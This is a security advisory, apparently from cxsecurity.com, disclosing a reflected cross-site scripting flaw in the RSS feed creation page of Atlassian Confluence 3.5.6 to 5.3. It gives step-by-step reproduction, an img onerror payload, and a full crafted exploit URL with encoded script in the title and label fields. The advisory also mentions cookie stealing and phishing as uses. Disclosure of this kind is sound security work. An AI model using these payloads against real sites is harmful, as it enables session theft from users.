Atlassian Confluence 5.3 Cross Site Scripting

2013.08.07
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Atlassian Confluence, the Enterprise Wiki Reflected XSS Details ============================================================================== Product: Atlassian Confluence 3.5.6 till 5.3(latest version), the Enterprise Wiki Security-Risk: Critical Remote-Exploit: yes Vendor-URL: http://www.atlassian.com Advisory-Status: Not Published Credits ============================================================================== Discovered by: Muhammad Waqar Affected Products: ============================================================================== Atlassian Confluence 3.5.6, the Enterprise Wiki till latest version Atlassian Confluence 5.3 Description ============================================================================== It's a wiki. You can use it to collaborate on writing and sharing content with your team. More Details ============================================================================== I have discsovered a Reflected Cross site scripting (XSS) inside Atlassian Confluence, the Enterprise Wiki , the vulnerability can be easily exploited and can be used to steal cookies, perform phishing attacks and other various attacks compromising the security of a user. Proof of Concept ============================================================================== Follow below steps to reproduce: Navigate to this link http://www.example/dashboard/configurerssfeed.action Now you see RSS feed creation options Select any options you want You can see "Advanced Options" click on it and in the input fields put my XSS payload that is "><img src=x onerror=alert(9);> Now click on "Create RSS Feed", it will navigate to another page where you see your inserted javascript executed. Exploit ============================================================================== Created Feed can be use any where and does not need any sort of authentication so it can be easy for cookie stealing and other attacks. http://$hostname/dashboard/doconfigurerssfeed.action?types=page&pageSubTypes=comment&pageSubTypes=attachment&types=blogpost&blogpostSubTypes=comment&blogpostSubTypes=attachment& types=mail&spaces=conf_all&title=%23%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3B%3E&labelString=%23%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3B%3E&excludedSpaceKeys= &sort=modified&maxResults=11&timeSpan=5&showContent=true&showDiff=true&confirm=Create+RSS+Feed Note: This exploit works in FireFox/Opera. Solution ============================================================================== Input provided by the user is not properly sanitized while posting it so it should be sanitized. -- Regards, Muhammad Waqar

References:

http://www.example/dashboard/configurerssfeed.action


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top